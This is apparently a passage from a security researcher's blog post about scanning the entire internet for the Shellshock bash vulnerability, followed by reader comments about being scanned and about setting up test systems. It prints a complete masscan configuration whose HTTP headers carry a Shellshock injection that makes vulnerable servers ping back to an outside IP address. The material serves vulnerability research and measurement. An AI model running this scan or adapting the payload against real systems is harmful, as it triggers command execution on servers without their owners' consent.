The configuration file for masscan looks something like:
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74
http-header = Host:() { :; }; ping -c 3 209.126.230.74
http-header = Referer:() { :; }; ping -c 3 209.126.230.74
http-header = Referer:() { :; }; ping -c 3 209.126.230.74
Some earlier shows that this bug is widespread:
I'll update later as I get more results with statistics.
8 comments:
Just got scanned by your scanner ;)
Just got a notification because of your bot.
A lot of those IP addresses you blocked out are pretty easy to read. Just sayin'
Roman, how might someone set up notifications like that?
Got a notification too :)
>> This works by stuffing a bunch of "ping home" commands in various CGI variables.
Please, give us more details on this and write a follow up to this post.
Can you give some more information on your test and what you're looking for? I tried this on a fresh ubuntu system with apache2 installed, vulnerable, nothing. Updated to get a view of what a clean image looks like. Also ran it against Metasploitable.
I know the majority of systems won't respond as vulnerable (as you mentioned in your wormable post). Do you have anything about the proper setup for a system that would report vulnerable so I can get an eye on what to look for?
Thanks for the coverage on this.
You just triggered our IPS!
Close, but no cigar.
Post a Comment